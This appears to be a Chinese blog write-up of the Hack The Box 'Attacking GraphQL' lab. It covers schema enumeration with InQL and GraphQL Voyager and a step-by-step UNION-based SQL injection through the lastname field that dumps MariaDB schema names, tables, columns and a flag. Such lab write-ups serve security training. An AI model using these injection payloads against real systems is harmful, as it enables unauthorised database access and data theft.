当前位置: 首页 > news >正文

HTB Attacking GraphQL Skills Assessment

news 2025/10/6 7:10:08

摘要

通过枚举应用,利用GraphQL API,发现sql注入点,然后利用找到flag

枚举

可以下载Burpsuite的InQL插件,进行快速枚举
在这里插入图片描述
利用网站:
https://apis.guru/graphql-voyager/
生成结构图
在这里插入图片描述
lastname入口口存在sql注入漏洞
在这里插入图片描述

利用

枚举列
在这里插入图片描述

4的时候正常,3的位置可以显示.

' union select 1,2,@@version,4-- -

在这里插入图片描述
数据库为mariaDB
枚举数据库

' union select 1,2,GROUP_CONCAT(0x7c,schema_name,0x7c),4 FROM information_schema.schemata-- -

在这里插入图片描述
接着枚举表

' union select 1,2,GROUP_CONCAT(0x7c,table_name,0x7C),4 FROM information_schema.tables WHERE table_schema='db'-- -

在这里插入图片描述
然后枚举列

' union select 1,2,GROUP_CONCAT(0x7c,column_name,0x7C),4 FROM information_schema.columns WHERE table_name='flag'-- -

在这里插入图片描述
最后得到目标数据

' union select 1,2,GROUP_CONCAT(0x7c,flag,0x7C),4 FROM flag-- -

在这里插入图片描述

http://www.dtcms.com/a/446002.html

相关文章:

  • 从化区城郊街道网站麻二村生态建设共青城市建设局网站
  • C# 调用 onnx格式的YOLOv11n模型
  • 使用PyTorch构建你的第一个神经网络
  • 数据结构哈希表--c
  • 腾云公司做网站赣州创可通科技有限公司
  • 大模型预训练深度解析:从基座构建到目标设计
  • 记一次网络io学习流水账
  • 网站建设与推广的实训报告天门网站网站建设
  • vue可以做pc的网站asp网站如何建设
  • YOLO11框架训练高光谱数据归一化问题
  • 宿迁网站定制有什么手机网站
  • 温州服务网站建设毕设用别人网站做原型
  • 八股文:计算机网络
  • MOVS 和MOVZ
  • llama.cpp RMSNorm CUDA 优化分析报告
  • 24ICPC成都站补题
  • DAY 41 简单CNN-2025.10.5
  • 网站建设的图片怎么加水印剪辑软件
  • 【c++】面 向 对 象 与 抽 象 数 据 类 型
  • 国内网站设计制作泰安招聘信息最新招聘2022
  • 第十二章:代理模式 - 访问控制的守护大师
  • 用wordpress建立学校网站网络营销软文案例
  • C++11线程相关
  • 住房和城乡建设统计网站网站开发公司需要招聘哪些人
  • 小土堆pytorch
  • 环保网站 中企动力建设专业的网站建设网络
  • 触摸未来2025.10.05:悟神经网络符号之伤,拥抱声音的宇宙
  • 大连鼎信网站建设wordpress简历模板
  • 关于运放的自激振荡和相位裕度
  • Edu164